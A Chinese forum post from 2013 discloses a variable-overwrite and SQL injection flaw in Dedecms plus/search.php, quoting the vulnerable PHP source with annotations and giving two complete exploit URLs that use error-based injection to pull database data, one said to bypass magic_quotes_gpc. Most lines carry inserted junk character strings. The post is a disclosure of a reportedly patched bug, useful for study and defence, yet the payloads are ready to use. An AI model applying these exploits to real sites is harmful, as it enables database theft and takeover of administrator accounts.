微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.! P/ ~1 T( y2 q3 o
作者: c4rp3nt3r@0x50sec.org
* c4 D& V" }4 [: C( eDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
+ R& E9 O! @! x, L [% b# J4 _: K/ `8 ~- m, E
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.& W( O9 a4 o) j( r, a/ J, O4 H) c# W
& E/ q1 [7 {& @ B/ {! c============2 d3 }/ }4 \6 m# I
2 w8 G& t! p% E( K" S+ W: o5 H
. I8 W- W* R9 B+ c2 [4 e/ [Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
1 F1 ] x9 }6 [, p. _ 9 g' A) e7 y5 N: X
require_once(dirname(__FILE__).”/../include/common.inc.php”);. c8 S |3 a1 L9 D% n! g
require_once(DEDEINC.”/arc.searchview.class.php”);
9 O% X `/ b1 O$ K- q) ^) ]
0 z# i4 j5 j, Y1 j% N$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
5 D6 i& O" @# x; y$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
; ^( R& _# F8 |6 O$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;/ n% Z* f1 a0 |! {4 H; m
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
O# u- d% m6 l+ o$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;5 x. R1 a2 F8 K' S0 V* e
9 N# ^( o0 Y" ^7 X( O5 \7 O$ l* \if(!isset($orderby)) $orderby=”;+ E: c* T! W7 F. T) D! t% S
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
) ~' a0 x! c- d6 U/ U2 s( {6 {3 K , l0 y- |5 f, V. q9 O
& s2 S! d- z) b! k: r5 C
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
4 i/ K: a. u" U0 s4 q% Felse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
- O3 ^7 F3 s/ ?. m" l' j
6 X+ Y) d7 @2 h, C0 m3 L6 }if(!isset($keyword)){
5 j% U1 N& K1 Q; c3 o if(!isset($q)) $q = ”;
( l% c2 l* S( A$ f: \" L $keyword=$q;
& n0 O6 K# u7 f& y}" ]7 N6 S/ H: L( l; I+ z
% x9 I3 c3 b ^, F9 @& u/ K$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));$ _9 q( D, p. N( x& b# F4 L9 C9 D1 g- v
5 b/ d$ U' T$ A* M
//查找栏目信息2 D$ D3 P& ^" G' u4 S
if(empty($typeid))
% n; n2 i7 k; x& |9 m/ u1 v- P{
' ~% B5 y5 s- s. i# X# H" _ $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
( p: G7 N2 f+ Z- @8 T; X) h if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
; _( A& `( n0 \ {
% }8 M6 {# a J9 m7 r $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
- B5 |: X. g( i) v* p! a fwrite($fp, “<”.”?php\r\n”);
( p. s* ]& Y, x9 B; @; s9 ~" ? $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
& G; ?2 h4 S4 q $dsql->Execute();
5 k5 O: |$ z2 a# K7 _0 E- G% B$ L9 Y while($row = $dsql->GetArray())/ ?: t) k$ `2 p/ F X$ J, d) M
{
; d: L! B' n$ s3 e6 \* [3 s fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
) ^5 b' m% T6 h6 U/ N8 V! z5 X5 z7 |2 K }+ Q1 X1 ?6 d( W$ P1 j8 O: N; |
fwrite($fp, ‘?’.'>’);
. D" M! _" P& V" J! p: A" M fclose($fp);
9 A' x" ~7 k4 n }% ]) I6 O3 g2 l2 q' s
//引入栏目缓存并看关键字是否有相关栏目内容6 m" z) p" K! V5 t
require_once($typenameCacheFile);7 K! c% O( r2 V! V6 ?9 p
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
& S5 Y/ b. m. F/ [" V! Z, F9 Y, V5 R//
( H9 V7 ~( J1 \1 e0 e9 p2 o9 Y if(isset($typeArr) && is_array($typeArr))" c' L+ @3 P/ z/ J# M# J5 y6 b
{
' s0 g& N' F% r5 l" H; L, ~" T. u foreach($typeArr as $id=>$typename)
* j( @1 R( Y; X {% P) E% R$ s% c) H5 @
* d, Y% p2 ^# n- G
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过, }% X2 Y# a, j! H/ I1 w
if($keyword != $keywordn)9 q* h& {% z3 |1 X9 @
{* w+ v" S8 T% r
$keyword = $keywordn;
7 i; j1 b! \& } <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设# m, X; [: w# S8 ~1 i0 d2 F
break;" Z2 Q3 U' L& \) H0 Y
}
5 g1 ~, K: P7 K) e# b }
6 \" x- r1 \/ p }
& ]4 @7 Q ~" K3 i9 z( k0 F1 J}
, v! E, H& m- V7 q- b& }7 e然后plus/search.php文件下面定义了一个 Search类的对象 .8 S; i3 l1 E# A, }- r, r; w7 I
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
1 S, G' k' j9 R6 q4 @$this->TypeLink = new TypeLink($typeid);2 Z6 I3 l' G; A9 [5 j+ r& i9 f
# V# }" N8 i& J6 b1 e
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句." a* n0 R0 ?4 H% g( k
4 H. r0 t: j3 ~3 Z. _7 @) O# z/ bclass TypeLink
, c e' S7 R' a: D4 s, }{
4 v8 G. ?" ^5 H \, p" g3 ?, N var $typeDir;$ D) o: K* h7 V6 X2 d7 K# V
var $dsql;
4 I6 e0 U) a0 Y2 i+ Q+ ?; y$ H* u var $TypeID;. t( t5 u# C( T/ a: m% O
var $baseDir;
" b- ]3 C8 {- V: J. q7 e var $modDir;
. X% i. r, G: V F7 m9 q var $indexUrl;7 o5 d9 ~6 y. t) D9 j) w
var $indexName;9 f; b/ G9 w, i, V1 H( ? G4 A/ w M
var $TypeInfos;6 K) E5 S C0 U7 R( a
var $SplitSymbol;
, D9 R+ D' m! y4 a var $valuePosition;
4 A. F& }4 Y: e" [9 `. V var $valuePositionName;
+ ], l; c! R6 u+ _- i0 `5 \ var $OptionArrayList;//构造函数///////
0 I7 B: r7 I. d3 Y //php5构造函数# A$ C7 s* ?& Z \- t
function __construct($typeid)
3 I' k' [, ?5 D& O" y4 W: t% v {
- p: }& S, Q5 f: X5 n t8 i $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
$ x2 `. p. d! N! W" D $this->indexName = $GLOBALS['cfg_indexname'];
/ R, I! |7 r i$ x $this->baseDir = $GLOBALS['cfg_basedir'];
. M0 V$ E, C6 a# Z" K' l $this->modDir = $GLOBALS['cfg_templets_dir'];
! X0 Z/ `9 @0 \ $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];8 I8 n5 @5 T3 t2 K+ k2 [) z
$this->dsql = $GLOBALS['dsql'];/ O5 g' i. I* z; m& \3 S
$this->TypeID = $typeid;8 e# \# M5 Q% w/ @
$this->valuePosition = ”;9 I" w; X7 t5 K: f' F' @( v
$this->valuePositionName = ”;
7 t* g3 W9 T6 L. y0 a $this->typeDir = ”;
' p8 l) m1 z, K. U/ K $this->OptionArrayList = ”;
& g; t6 E- i/ a- m1 Q
, h: a" E5 b& \6 q4 A0 O //载入类目信息/ v+ p1 D9 ~ D1 c: T/ g3 ~
" ?( H; m7 p# K" u# q3 d2 r <font color=”Red”>$query = “SELECT tp.*,ch.typename as
* [, C+ G' b9 [' Tctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
9 H+ F2 \2 X: l: ~`#@__channeltype` ch
* x Y0 [1 D$ R) V2 i7 s: V+ o on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿4 K b# l7 B5 G |
8 a" g7 M" E: m0 }
if($typeid > 0). B. B8 a ]8 e4 ]
{, E* @& j; W- u$ l
$this->TypeInfos = $this->dsql->GetOne($query);
% K0 F O! i9 n( Q利用代码一 需要 即使magic_quotes_gpc = Off- [& w1 T) \' d# |* \9 L A( q
- O1 _' c! |1 iwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title. Z2 v, h- Q: N% j. h0 o
' @1 { H, ?* L+ Y8 |$ v这只是其中一个利用代码… Search 类的构造函数再往下
. C$ T' @! M9 H 2 t& R% E$ }1 v$ ?
……省略
6 G9 b. ]4 }- l$ }$this->TypeID = $typeid;
3 j% ^0 l. U8 M3 I$ d4 S. ?……省略2 f# u* n" [8 Z; @( ]
if($this->TypeID==”0″){
, G( [; Q+ q* x4 c" T8 Q* L9 x: { $this->ChannelTypeid=1;
9 a: j- ^2 r, w& B1 t' x }else{
; m# ^* J" I9 G* ?% N+ a $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲1 ^( N( ~9 J0 L2 g8 A. y
//现在不鸡肋了吧亲…: a6 G2 e) ^. h9 {' M3 V
$this->ChannelTypeid=$row['channeltype'];8 v5 M' Y; V3 k+ N0 ?* m: k
7 j* m) v# I( V& Z
}: x+ W3 a- }5 k* F7 p2 K+ f9 b
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
. B- j# Z. d# S u, G0 F / f) `/ {/ h- q( ^: T1 C3 d) K
www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
; U' o( }1 A1 x5 F+ u/ W0 @ B+ |; Z
^3 { ?8 u( R8 u2 I, i4 L. d7 a5 C如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
. T8 l. b, X' `4 T* u |
发表于 2013-1-19 08:18:56
收藏
支持
反对